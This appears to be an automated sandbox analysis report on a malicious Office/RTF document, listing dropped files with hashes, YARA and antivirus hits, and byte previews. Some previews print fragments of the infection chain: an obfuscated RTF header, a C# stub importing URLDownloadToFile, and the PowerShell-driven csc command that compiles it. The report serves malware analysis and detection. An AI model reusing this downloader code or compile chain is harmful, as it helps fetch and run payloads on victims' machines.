                                                SHA-512:778CEEFC76571268A7C82C18EC1B6F6661B4F696D2612528B8EB94488383C84C9DBA6613CD5B1C715514E64D062D73D28D84395F30DADB4FD2DA51CBAC372D35
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18F2865F.doc, Author: ditekSHen
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:{\rtf1..........{\*\pnaiu472632820 \"}.{\6420395929598_&=)@?=7(@06?3%%'(??-'>`1<.$0'8|`_[.?0]%_.:@&^8..1.|..43?>_96?=?!.%=#?%~/;!+(,#^%`$!!?0?!]%<0-00>)!.43|?6$.?:$#[$.>9:^^&$.*</5~-(,]:^*3<;;7!+5/^.?;$-<(.3.=71[??.86+06;$'845*?<(?6@`!_7?,@;-@&-3%_&-9&$%0_%!:?'?[`:?9&/?&?1`.3.?'7%?8=_`70)4?-6[0$5``.||%~+$2.6()/0=.10.9..?#86<?%7*_>:1??_/2~4)+.5(%^#149:.^=7+&'`.4?/11?_+0=%`+~:?.*'[?%^#?4=,,_`|?.?.$6#*%>&>;)+4?9?0?~&-`'??8)8%.<'=.#9#3-'5:*$%%[6*[:1##..@=&.3&=.5`5.??8/-8&[^?=?.|^/?&~(]/#<~.9[8?.?4]+%@@%.2-.64>.<.1>`(70?|8`$?1,~[^8?0)?=;,?#>:9=%;?%.=^0<$9)%&-4([&`?44*8|2[;+~<7#-*<67]651470..`[??=.)01+@12~#['3?=7??0+~?,&88[?%],23$'.[?,3%>@-&.??.%??[3+1...@@=!193)%?<(.[%.?%:)(/:9[$*??&-4[?!#2;8*:4=.2]-%^+'=.?+!$?2.6^%:|'`:_)/~|;]/]6'/-.@2?~2.?#:'%&-5%~5/[*.^84??(..|^:[@7=8]!'7<(|?|1^.`#|.-^80?3?3|#??||~.7$#8;?.#7=?%&?=[$92(_@?([)~$`99,#66)/2]_`*?@*.#.8]<@([?:;&7'$8>!*[3!?%1*;/08)=<`:$06.3?3|,0$>~:.[%,.?~&?)|%:'?5 4+9#(4-/]?)4_)3!*.7&$????;%?=50.]7_%'0&;?2_$$+~4[2*!^?#,$?]!-4)'$=>1<63'.-<^85
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                Category:dropped
                                                Size (bytes):7428
                                                Entropy (8bit):5.614949866122965
                                                Encrypted:false
                                                SSDEEP:96:yJBOblJaXn/08zDefAm/luoOHo6MiDbDda91RjTBbPxmPAWmOHGXED:yGTNAK4oOIGbK1RvVwPAWmOHGXw
                                                MD5:A0981767D618160D66397C829AF1CEFB
                                                SHA1:CB76812F91F24C49385A2E99E6BBC657FCB0E18F
                                                SHA-256:48F87B835ADFA658EADF4C6D9321B08308B0B9F8292E7013CD0751A8F52E1EAB
                                                SHA-512:B41798F1F835DFA57C701ABDF94EDD140F92C93D66374264E7E4D420D4E2A1A2FCB719C78EE19E5476B3F3B20E37A2350A64DDAE0AF1C6866EE8A9E4937FAEDB
                                                Malicious:false
                                                Preview:....l...............<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................p.6.).X.....S.d.....................O..O....s....\.....O.......O.|.O.7..s......O..].u?..s.......s..p...vw.Mq...b.....8.O...sw..q.$.......d.........O.*X.s.....X.s.?q..Mq...n...b.-...d.O.6=rw................<..u.[.v....X..Z......p........................vdv......%...................................r.......x...........'...x.......(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PNG image data, 42 x 51, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):822
                                                Entropy (8bit):7.616419704330421
                                                Encrypted:false
                                                SSDEEP:12:6v/7LWb/EYintm3eiVOOrbyUv5uNEXoNGJ/qiIXrqOoNUHGcvlf3vKyo1AIJc8Ni:eeinouisOPAYGK/qhLoNUHL9f3iZPpNi
                                                MD5:35C4E9D7C83D8F4A6792B18A15937836
                                                SHA1:FD15558DDC4DB88D3BB5491F2064B3C2AFBC85DF
                                                SHA-256:A8C99F80AB0A94ED469AE026947C14FF6C41F7EB816933EB7A54FCB937FB82B6
                                                SHA-512:1906EFA3A254C7E955D786C15C4E1A870B5BD9BFC815704E7BE507FEF383E5F602783C55EC33D0CB38710FC44728E97F36FE25E67B6C4934C221DB525B25D67C
                                                Malicious:false
                                                Preview:.PNG........IHDR...*...3.............sRGB.........gAMA......a.....pHYs..........o.d....IDAThC.=.)Q....i...B.P.D..mU+..P..Y.Q..Pjh..H.$.."..n..H.t..w......\o._r....d..{g.1..........E..p...h4.....>..L&..V..........m_,..///x.^..jEG]FWQ.L$..B.....v..g.YM..B..|>.G.QM....J..g?.t...I.n....5........O....K..wE.u{Z........2.N..b.....Zt..A2...`@[...n...P.....,..0..P$._#e..W&..S%..~zz..8..-......1v..`...c...T...'e...m.....$..v...-.l6).D"......i?....f.....L&.....e.`.N.S.....2y...!.....%..l(..,.r.L..`..C.a.>??S&..<.D...).,.K.....Z......)..K.f.Q&..j..%.t:..(.....LX...c......-..x(..>...[..r.M...^.G..E...JQ%.Q..V.....4..L.*c.J...J%...*Q...C6..J... ........*.....mj....d.d.5.....g.."({zb5./.....V?J..a.4J..TQd4..>...tQ.\.8.ZRZq3Q.;.N.bo.+.b.G[|m..f.X,....V.x<~.k.....E.....I..........IEND.B`.
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PNG image data, 55 x 39, 8-bit colormap, interlaced
                                                Category:modified
                                                Size (bytes):1136
                                                Entropy (8bit):7.14782184831536
                                                Encrypted:false
                                                SSDEEP:24:ct4piFqtc+YQKOQw45DymHbFUN9F2zFg91p:Poqtc+fJX+Xarrp
                                                MD5:49A2F544E34D8473E29F8C4D9CB10D78
                                                SHA1:8B30666DE8F119B1C2E800C2B2437C09C4F6CEC9
                                                SHA-256:52417106494ECBBDD3A3D56DE565996562A1C0B0C29C4F43ED99E5FCB4805E07
                                                SHA-512:091D234ED76AFDEFC4AB3D1687FEE14DDFCFE0149F01106716ED383EB6FC8913803B26A32C69E15ECC85F6781DF09BD1C712193D8A234042E844730C56864128
                                                Malicious:false
                                                Preview:.PNG........IHDR...7...'........y....sRGB.........gAMA......a.....PLTE..............===SSS........."""...---......uuu....................'''.........|||~~~..............$$$...555..........YYY......@@@.........ddd...___.....................,,,......DDD.....000.............u...}}}......???......&&&.........UUU......HHH.........jjj777.........qqq...III......yyy......XXX..........;;;...444.....[[[.........sssppp...BBB...+++...>>>!!!mmm...AAA...###zzz%%%...TTT...xxx......JJJ....bbb...FFFNNN {{{.........VVV.................tRNS..........................................................................................................................................................^p.....pHYs..........+......IDAT8O.M.. .....+...*.`.b..{.H\.s..._H..b..|....>...x...o.<.D-..d..&+..'L....2..g<0...1.s.E_..c)..EY..4d..DCJP/....d&.......p4........Y..$.>^..\.Y8.:.wjg.+.~.j.".v....!<.......j...+.i.R.7....Fi.yRA.2+.tK....F3..f4..m...L..z>.X.....,..hv..y..j.G.....s..`..e..<....
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):61440
                                                Entropy (8bit):7.213901799807932
                                                Encrypted:false
                                                SSDEEP:768:1HUDYX89n64o5bzkv8iCjOm3uv90YVXHwzYX89n64o5bzkv8iCjOm3uv90YVXHw:tUQyviF3WTNH1yviF3WTNH
                                                MD5:47B9AAB432F972771241AAF35DB6F070
                                                SHA1:C7EC4F314D74E15C96E1D8C66AD6082050A27BB7
                                                SHA-256:913BF8D879111378B0B7349B1703D238AC336E852583AF41E06FC5B5B76EF09B
                                                SHA-512:76A117683135F3574EAFF9EB7A8C2D2591063ACFF2DA77EA5316A1E82F08EA350C134C267D6AECC641745FBE693DD5445BF44F2C338DA9465BF6428AABA63622
                                                Malicious:false
                                                Preview:......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................@...>........................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=.......?...v.......B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u.......................
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):0.05390218305374581
                                                Encrypted:false
                                                SSDEEP:3:ol3lYdn:4Wn
                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                Malicious:false
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1536
                                                Entropy (8bit):0.5528375746276538
                                                Encrypted:false
                                                SSDEEP:3:Gg7NNKElClDK/lNlYdltn/lvllLl/2qlrzNBqkzNB/EPXwPxZlhWu/+6n:3pUElClDK/e3Xt7j/mXwPxZSu26
                                                MD5:1CDE6EB529DAF198F0A2C88465709CA0
                                                SHA1:B3375E057829A7A8B7D0929160F59EE2414DA928
                                                SHA-256:6F07DF007C3ABC15BFD89BD942FDC1A75F4C9E523C4D20C5B6441156B85B11AA
                                                SHA-512:052A97933AD5F2A60D511836DE796E0987F4C0DF38588B0C8B6B5B9CD3D2D53BF374349AC43EF70041D728C54647B56A3329EDD0EFCF166AF5A9D06AFEE3B564
                                                Malicious:false
                                                Preview:....E.M.B.E.D. .P.a.c.k.a.g.e..... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):11776
                                                Entropy (8bit):3.5282593043027797
                                                Encrypted:false
                                                SSDEEP:192:hOQ+tBZwG42b+pn0wke6hfXsWhAGLbOho20cB2uzM5Qsr8nWWLJKdQUcTCXw7N4+:0QafJv+pncfXsWhAG+0cBHkSWWdUcTTz
                                                MD5:7844482DE837B7A77771E3C42A771683
                                                SHA1:56E93764B342C84FAD56039FCF687003E5A95E3C
                                                SHA-256:C23EBFBFEB0D7793E6DC212083F96A5C1E5AC20FA2BC060E2EA4C4C2D72D0ADC
                                                SHA-512:3A9DBDC07D516CD234B3F7882AC4192326CB805EFBAF82E68A6C6AC2B29E07A5625704B1A1487B0474CF24152518DE489C7A410BCD07C8FAC01297B33E377E84
                                                Malicious:false
                                                Preview:........4.2.0.3.9.5.9.2.9.5.9.8._.&.=.).@.?.=.7.(.@.0.6.?.3.%.%.'.(.?.?.-.'.>.`.1.<...$.0.'.8.|.`._.[...?.0.].%._...:.@.&.^.8.....1...|.....4.3.?.>._.9.6.?.=.?.!...%.=.#.?.%.~./.;.!.+.(.,.#.^.%.`.$.!.!.?.0.?.!.].%.<.0.-.0.0.>.).!...4.3.|.?.6.$...?.:.$.#.[.$...>.9.:.^.^.&.$...*.<./.5.~.-.(.,.].:.^.*.3.<.;.;.7.!.+.5./.^...?.;.$.-.<.(...3...=.7.1.[.?.?...8.6.+.0.6.;.$.'.8.4.5.*.?.<.(.?.6.@.`.!._.7.?.,.@.;.-.@.&.-.3.%._.&.-.9.&.$.%.0._.%.!.:.?.'.?.[.`.:.?.9.&./.?.&.?.1.`...3...?.'.7.%.?.8.=._.`.7.0.).4.?.-.6.[.0.$.5.`.`...|.|.%.~.+.$.2...6.(.)./.0.=...1.0...9.....?.#.8.6.<.?.%.7.*._.>.:.1.?.?._./.2.~.4.).+...5.(.%.^.#.1.4.9.:...^.=.7.+.&.'.`...4.?./.1.1.?._.+.0.=.%.`.+.~.:.?...*.'.[.?.%.^.#.?.4.=.,.,._.`.|.?...?...$.6.#.*.%.>.&.>.;.).+.4.?.9.?.0.?.~.&.-.`.'.?.?.8.).8.%...<.'.=...#.9.#.3.-.'.5.:.*.$.%.%.[.6.*.[.:.1.#.#.....@.=.&...3.&.=...5.`.5...?.?.8./.-.8.&.[.^.?.=.?...|.^./.?.&.~.(.]./.#.<.~...9.[.8.?...?.4.].+.%.@.@.%...2.-...6.4.>...<...1.>.`.(.7.0.?.|.8.`.$.?.1.,.~.[.^.8.?.0.).?.=.;.
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Microsoft Excel 2007+
                                                Category:dropped
                                                Size (bytes):26110
                                                Entropy (8bit):7.621832725963441
                                                Encrypted:false
                                                SSDEEP:384:4X89n8bp+o5bjfTlqveNi/36emvOmHGJMHuMw9fvHZSildVX1ZZ2bm:4X89n64o5bzkv8iCjOm3uv90YVXHwm
                                                MD5:B9EEC5763BD7CF995AE4CB02F24A7E2B
                                                SHA1:9C450546C6632262C7BABD5BA1990CD0B30E14D6
                                                SHA-256:FB55559C6DDD496228CCB56832AAC3B21291872CAD1D4B61C5F4FC4F8F0D1BAA
                                                SHA-512:D3D1874B7C0984952FE7381E00FA97FDE86CB2476AEBF73FE8347B2DA274160B76BBE98AAF866CBEA5FB4ACB23E9FA04423AA1E7E1DD02EDDED92A4F7D058395
                                                Malicious:false
                                                Preview:PK..........!...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.0..#.....q..j...# ..`.mb.-....6.B.4..K..wfv...l.......q^.E.^.c}.......7....X.....d...W{lDG...D.A....<..C...kjeTz.Z.......x.Q....-....n...J......L.....Z......!....j0A...]cL..v..:&.....1.r+g...N.g.y}{E....\.Psei.;.....!.....?`...'..A..\:....-.E..d_3..u.......FYn.G...+..:...d......."...m/.C.J`...=.....:LR.Y.\?....h.W+.o:..#........BD.......\=....,l.a.O.a.p<.c..k.l.%._.......PK..........!..U0#....L...
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:gAWY3n:qY3n
                                                MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                Malicious:false
                                                Preview:[ZoneTransfer]..ZoneId=3..
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x486, 9 symbols, created Wed Nov 20 09:11:22 2024, 1st section name ".debug$S"
                                                Category:dropped
                                                Size (bytes):1324
                                                Entropy (8bit):4.007449865591867
                                                Encrypted:false
                                                SSDEEP:24:HB69vrq+dHNfwKPfeI+ycuZhN8GakS9XPNnqSud:wrqOtoKPm1ul7a33qSu
                                                MD5:276A04ED0B64EBEA7674D63FB379AF48
                                                SHA1:89AACDD673FB394A172D18B1A3C7F3C8E417892D
                                                SHA-256:C8C861A70BB3A94A61EBF2F0850F86B66522FE534628DF966590A666F38C91A0
                                                SHA-512:D4F6F5E0AF9B464655CA354864EB8401E900A95B36A2A62BBC5AD92131A9138BE15A6046791B12894658F9EFA427858A9523D3DB0B93781CDF5B62E0728E5D72
                                                Malicious:false
                                                Preview:L.....=g.............debug$S........H...................@..B.rsrc$01........X.......,...........@..@.rsrc$02........P...6...............@..@........S....c:\Users\user\AppData\Local\Temp\b2mggwzy\CSC80BAF758EA8A4749878CF9DF238E437.TMP.................j..M.YJM^.7.e...........4.......C:\Users\user\AppData\Local\Temp\RES950F.tmp.-.<....................a..Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.2.m.g.g.w.z.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                File Type:MSVC .res
                                                Category:dropped
                                                Size (bytes):652
                                                Entropy (8bit):3.1132176578740833
                                                Encrypted:false
                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry2Gak7Ynqq9XPN5Dlq5J:+RI+ycuZhN8GakS9XPNnqX
                                                MD5:0C6AD1971A4DB1594A4D5E9837D6659F
                                                SHA1:AE34149E6049017631B09D0F50FA0F7B129255D6
                                                SHA-256:18AF0117D8BA36365F61D9D60B7A5153FE416E560487EC211B0D7F990F372579
                                                SHA-512:59A35CDBCE23C37DCA6121104447F696709C598C4EEB604E7F8303A4E19FFF7EDC4C2D47E9EC7893AE13DF8DC070FB54F80C2CCA28D9322CED7E6DEB400CE2E0
                                                Malicious:false
                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.2.m.g.g.w.z.y...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.2.m.g.g.w.z.y...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (361)
                                                Category:dropped
                                                Size (bytes):480
                                                Entropy (8bit):3.827531183529261
                                                Encrypted:false
                                                SSDEEP:6:V/DsYLDS81zuwAH0kHMelQXReKJ8SRHy4HjvWbuMC5NjN6qQy:V/DTLDfuwaKXfH/WCpiy
                                                MD5:B0517586F4097114E790C61F2685F0D5
                                                SHA1:20F7482298AB96731228EBD5242CEDDFD72FF50F
                                                SHA-256:A738E3AF6F29EDD637630B0299F306056042EA1C73850EEE95498499F5D90237
                                                SHA-512:C28702017CE7FE0D34BEA38CEF48DF3BB65C63D92DDDD6F8264F7262F7AE61B8D71BCD6FEC06D0792373D15BA84FB2A1D0C26B0FE5755BC20505A9197D654BA0
                                                Malicious:false
                                                Preview:.using System;.using System.Runtime.InteropServices;..namespace LYPhpfZVh.{. public class PKJmdq. {. [DllImport("uRLMoN.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr LODMlIYFHF,string eO,string Lrd,uint kCMv,IntPtr sKwhSUgFd);.. }..}.
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                Category:dropped
                                                Size (bytes):369
                                                Entropy (8bit):5.26294156753755
                                                Encrypted:false
                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fu0n0zxs7+AEszIP23fupWH:p37Lvkmb6KzSWZEoMWH
                                                MD5:0E5A90D8DE21AA46BAB8FD4727C1EE78
                                                SHA1:FED9AABA69B7042F34DBF2EC34764CE3C59BB0AF
                                                SHA-256:F45FD783DCCDDD6E1B33C0CEDFE4A0B38C20B5FC34C51B8571AC25DE4926BC7C
                                                SHA-512:80654B2C40038A592F6B5EE027037FBA89400BEB59789DC1EEC0D68B182063F1364C38968CA9F30FD6E7F882BB81F9050C556F001FB1131BE5701B661E4D3A65
                                                Malicious:true
                                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.0.cs"
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):3072
                                                Entropy (8bit):2.8464922010871847
                                                Encrypted:false
                                                SSDEEP:24:etGSnPBe5ekrl88NRck5w5kujf/UoItkZfFkxNwbCZ0WI+ycuZhN8GakS9XPNnq:6wskr+WQf8o/JFYwbCZX1ul7a33q
                                                MD5:D40C06757416FB9B1840A2E75CED3321
                                                SHA1:B20AE15C335C12C50E6D405F3068406D264E1C7E
                                                SHA-256:653E366032D42C3DE07EBAD67BFF6362756E29DCC1C9AB34D6D79AA35DCEBD56
                                                SHA-512:3C07D4603C0EF8CAD8EDC15BAE59684DD8521B2AC177A728A556D1E006FDC74135773B82B8C4053AB399E3FB0AAB691599C67C9E3F7B9C2B582E96ED26B35072
                                                Malicious:true
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....=g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................8.1.....x.....x.......................................... ?.....P ......Q.........W.....b.....e.....i.....n...Q.....Q...!.Q.....Q.......!.....*.......?.......................................(..........<Module>.b2
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (443), with CRLF, CR line terminators
                                                Category:modified
                                                Size (bytes):864
                                                Entropy (8bit):5.348555897133014
                                                Encrypted:false
                                                SSDEEP:24:Aqd3ka6KzDEoeKaMD5DqBVKVrdFAMBJTH:Aika60DEoeKdDcVKdBJj
                                                MD5:278BD2C3A021C3D243267C3786C3BA9D
                                                SHA1:AFEE1CA2C3B532CC2072FC9CE4D40864288A0B78
                                                SHA-256:3C37E3EF139CB0464AEA1B0C8146296C5F901AD860CBCF2F579A09A4C2161CEC
                                                SHA-512:F03F7FCBFF623E9C8793936F4B0D7349C523F3A781EB2EC533EF3D0D9CC17EABCA3FF37AB83BBBF53D477CB3115F0FD693EEE13A765B09370D5E41B951CD5F9B
                                                Malicious:false
                                                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):131072
                                                Entropy (8bit):0.025668551963191094
                                                Encrypted:false
                                                SSDEEP:6:I3DPcDEHvxggLRDQuXSHlRiZTtRXv//4tfnRujlw//+GtluJ/eRuj:I3DPbX7ylWTvYg3J/
